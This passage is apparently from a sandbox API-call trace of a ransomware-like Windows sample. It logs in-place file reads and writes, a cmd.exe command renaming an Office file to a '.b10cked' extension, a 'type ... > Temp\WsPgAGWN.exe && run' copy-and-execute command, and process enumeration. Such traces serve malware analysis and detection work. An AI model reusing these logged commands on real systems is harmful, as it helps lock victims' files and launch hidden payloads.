[0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x23e78 [0173.381] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x24360 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x24360 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0173.383] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0173.383] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.384] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x31af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x31af, lpOverlapped=0x0) returned 1 [0173.385] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0173.385] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.385] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x31af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x31af, lpOverlapped=0x0) returned 1 [0173.385] SetFilePointer (in: hFile=0x114, lDistanceToMove=-74159, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x121b1 [0173.385] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.386] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x31af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x31af, lpOverlapped=0x0) returned 1 [0173.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=-74159, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 
| out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x121b1 [0173.387] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.387] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x31af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x31af, lpOverlapped=0x0) returned 1 [0173.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0173.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0173.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x24360 [0173.391] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0173.391] CloseHandle (hObject=0x114) returned 1 [0173.392] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX") returned 0x3c [0173.393] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0173.394] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xa84, dwThreadId=0x994)) returned 1 [0173.395] CloseHandle (hObject=0x1b4) returned 1 [0173.395] CloseHandle (hObject=0x114) returned 1 [0173.395] GetTickCount () returned 0x327ca [0173.395] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc04 | out: lpPerformanceCount=0x12fc04*=23018446960) returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: 
lpWideCharStr="\x57\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x73\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x50\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: 
lpWideCharStr="\x67\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x41\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x47\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: 
lpWideCharStr="\x57\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.396] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0173.396] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0173.396] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0173.396] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0173.396] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", 
cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0173.396] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0173.396] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\WSPGAGWN.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\WSPGAGWN.EXE\" [PARAMS]") returned 0xb1 [0173.396] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0173.396] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb20*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb10 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessInformation=0x12fb10*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xaa0, dwThreadId=0x968)) returned 1 [0173.401] CloseHandle (hObject=0x1b4) returned 1 [0173.401] CloseHandle (hObject=0x114) returned 1 [0173.401] Sleep (dwMilliseconds=0xfa) [0173.783] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x120 [0173.789] Process32FirstW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.790] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.791] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.793] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.794] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.795] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.796] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.798] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.799] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.800] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0173.801] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.803] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.804] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, 
